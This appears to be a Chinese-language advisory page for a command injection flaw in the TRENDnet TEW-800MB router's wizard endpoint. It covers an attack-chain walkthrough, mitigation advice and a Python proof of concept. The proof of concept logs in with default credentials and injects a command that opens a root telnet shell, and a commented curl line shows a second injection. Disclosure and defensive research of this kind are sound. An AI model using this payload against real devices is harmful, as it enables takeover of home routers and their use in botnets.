CVE-2025-15136 TRENDnet TEW-800MB 设备命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-15136

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

TRENDnet TEW-800MB 1.0.1.0

漏洞概述

CVE-2025-15136是TRENDnet TEW-800MB 1.0.1.0版本路由器中发现的严重命令注入漏洞。该漏洞存在于设备的Web管理界面中，具体位于/goform/wizardset文件中的do_setWizard_asp函数。攻击者可通过构造恶意的WizardConfigured参数值，在受影响的设备上以root权限执行任意系统命令。由于该漏洞的CVSS评分高达8.8分，且具有网络远程利用的特性，对互联网上的大量设备构成了严重威胁。攻击者无需高级权限即可发起攻击，且无需用户交互，这使得漏洞的利用门槛极低。该漏洞已公开披露，相关的技术细节和利用代码已在互联网传播，厂商在收到早期通知后未做出任何响应，目前尚无官方修复版本。鉴于该漏洞的严重性和广泛影响，强烈建议用户采取临时缓解措施并密切关注厂商更新。

技术细节

该命令注入漏洞源于TRENDnet TEW-800MB路由器Web管理界面的输入验证不足。在/goform/wizardset端点处理的do_setWizard_asp函数中，系统直接使用HTTP请求中的WizardConfigured参数构造系统命令，而未进行充分的输入过滤或参数化处理。攻击者可利用分号、反引号或管道等shell特殊字符，在参数值中嵌入恶意命令。由于设备以root权限运行Web服务，注入的命令将以最高权限执行，实现完全的系统控制。攻击者可通过发送精心构造的HTTP POST请求到/goform/wizardset端点，触发漏洞。例如，使用wget或curl等工具下载并执行恶意脚本，建立持久性后门，或将设备纳入僵尸网络。漏洞影响路由器的管理接口，该接口通常可通过LAN或WAN访问，取决于设备配置。攻击成功后，攻击者可窃取网络流量、监控用户行为或发起进一步攻击。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标设备为TRENDnet TEW-800MB 1.0.1.0版本路由器，通过端口扫描确认Web管理界面可访问（通常端口80/443）

STEP 2

2. 认证获取

攻击者使用默认凭据或弱密码（如admin/admin、admin/password）登录路由器管理界面，获取低权限访问

STEP 3

3. 构造恶意请求

攻击者构造包含shell特殊字符（如分号、反引号）的WizardConfigured参数值，用于注入系统命令

STEP 4

4. 发送漏洞利用请求

通过HTTP POST请求将恶意payload发送至/goform/wizardset端点，触发do_setWizard_asp函数中的命令注入

STEP 5

5. 命令执行

注入的命令以root权限在路由器上执行，攻击者可执行任意系统操作，包括下载恶意软件、建立后门

STEP 6

6. 持久化控制

攻击者可通过写入启动脚本或修改系统配置建立持久性访问，将设备纳入僵尸网络或用于进一步网络攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15136 PoC - TRENDnet TEW-800MB Command Injection
# Target: TRENDnet TEW-800MB 1.0.1.0
# Endpoint: /goform/wizardset
# Parameter: WizardConfigured

target_ip = "192.168.10.1"  # Router IP address
target_port = 80

# Authentication required (low privilege user)
# Default credentials: admin/admin or admin/password
username = "admin"
password = "admin"

# Construct the malicious payload
# Inject command to create a reverse shell or execute arbitrary command
# Using semicolon to chain commands
injected_command = ";telnetd -p 8888 -l /bin/sh;"  # Start telnet server on port 8888

payload = {
    "WizardConfigured": injected_command,
    "submit-url": "/wizardset.asp",
}

# Login to the router
session = requests.Session()
login_url = f"http://{target_ip}:{target_port}/login.cgi"
login_data = {
    "username": username,
    "password": password,
}

try:
    # Attempt login
    resp = session.post(login_url, data=login_data, timeout=10)
    print(f"Login response status: {resp.status_code}")
    
    # Send exploit payload
    exploit_url = f"http://{target_ip}:{target_port}/goform/wizardset"
    resp = session.post(exploit_url, data=payload, timeout=10)
    print(f"Exploit sent. Response status: {resp.status_code}")
    print(f"Target may now have telnet service running on port 8888")
    
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

# Alternative: Use curl command
# curl -X POST -d "WizardConfigured=;ls -la>../../../www/cmd_output.txt" \
#   -u admin:admin http://<target_ip>/goform/wizardset

影响范围

TRENDnet TEW-800MB 1.0.1.0

防御指南

临时缓解措施

立即禁用路由器的远程Web管理功能，仅允许通过本地网络访问。将管理界面绑定到特定IP或使用访问控制列表限制访问源。修改默认管理员密码为强密码，并定期更换。如设备支持，可考虑使用VPN进行远程管理以增加安全层。同时监控设备日志，关注异常的登录尝试和配置变更请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15136
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15136
3 Details https://www.cvedetails.com/cve/CVE-2025-15136/
4 VulDB https://vuldb.com/cve/CVE-2025-15136
5 Link https://pentagonal-time-3a7.notion.site/TRENDnet-TEW-800MB-2c7e5dd4c5a58067bc81e530bf3191c0
6 Link https://vuldb.com/?ctiid.338514
7 Link https://vuldb.com/?id.338514
8 Link https://vuldb.com/?submit.714042